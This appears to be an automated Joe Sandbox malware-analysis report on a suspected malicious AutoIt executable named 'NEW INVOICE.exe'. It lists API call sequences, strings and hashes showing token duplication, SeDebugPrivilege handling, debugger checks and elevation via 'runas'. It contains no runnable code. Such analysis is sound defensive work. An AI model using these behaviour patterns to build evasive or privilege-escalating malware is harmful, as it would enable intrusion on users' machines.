                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                    • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                    • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                    • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                    • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                    • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                    • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 03F73729
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                    • Instruction ID: 7d6bdd0e6d854467e51220448e48c7b3b583b5a496f6fde90f68c34b984f2b03
                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                    • Instruction Fuzzy Hash: A1E0BF7494410DEFDB00DFA8D54D6DD7BB4EF04701F1005A1FD05D7680DB309E549A62
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 03F73729
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062931234.0000000003F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F71000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_3f71000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: e171c82803ab597f8e89d4f8e8ba4d74cc12e0ce762d759628c79abba15c21f4
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: EAE0467594510DEFDB00DFB8D54D6DD7BB4EF04701F1045A5FD05D2280D6719D509A62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                                    • API String ID: 0-4260964411
                                                                                    • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                    • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                    • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                    • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                    • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                    • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                    • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                    • SendMessageW.USER32 ref: 0047C2FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$State$LongProcWindow
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 1562745308-4164748364
                                                                                    • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                    • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                    • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                    • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                    • IsIconic.USER32(?), ref: 004375E1
                                                                                    • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                    • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                    • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                    • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 3778422247-2988720461
                                                                                    • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                    • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                    • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                    • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0044621B
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                    • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                    • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                    • _wcslen.LIBCMT ref: 0044639E
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • _wcsncpy.LIBCMT ref: 004463C7
                                                                                    • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                    • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                    • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                    • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                    • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                    • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2173856841-1027155976
                                                                                    • Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                                    • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                    • Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                                    • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                    APIs
                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NEW INVOICE.exe,?,C:\Users\user\Desktop\NEW INVOICE.exe,004A8E80,C:\Users\user\Desktop\NEW INVOICE.exe,0040F3D2), ref: 0040FFCA
                                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                      • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                      • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                    • _wcscat.LIBCMT ref: 0044BD96
                                                                                    • _wcscat.LIBCMT ref: 0044BDBF
                                                                                    • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                    • _wcscpy.LIBCMT ref: 0044BE73
                                                                                    • _wcscat.LIBCMT ref: 0044BE85
                                                                                    • _wcscat.LIBCMT ref: 0044BE97
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2188072990-1173974218
                                                                                    • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                    • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                    • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                    • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                    • __swprintf.LIBCMT ref: 00434D91
                                                                                    • _wcslen.LIBCMT ref: 00434D9B
                                                                                    • _wcslen.LIBCMT ref: 00434DB0
                                                                                    • _wcslen.LIBCMT ref: 00434DC5
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                    • _memset.LIBCMT ref: 00434E27
                                                                                    • _wcslen.LIBCMT ref: 00434E3C
                                                                                    • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 302090198-3457252023
                                                                                    • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                    • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                    • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                    • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                    APIs
                                                                                      • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                    • GetLastError.KERNEL32 ref: 004644B4
                                                                                    • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 1312810259-2896544425
                                                                                    • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                    • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                    • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                    • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                      • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NEW INVOICE.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                      • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                    • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\NEW INVOICE.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                      • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\NEW INVOICE.exe,00000004), ref: 0040D7D6
                                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\NEW INVOICE.exe,00000004), ref: 00431B0E
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\NEW INVOICE.exe,00000004), ref: 00431B3F
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                      • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                      • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                      • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                      • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                      • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                      • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                    • String ID: @GH$@GH$C:\Users\user\Desktop\NEW INVOICE.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                    • API String ID: 2493088469-3840031741
                                                                                    • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                    • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                    • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                    • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                    APIs
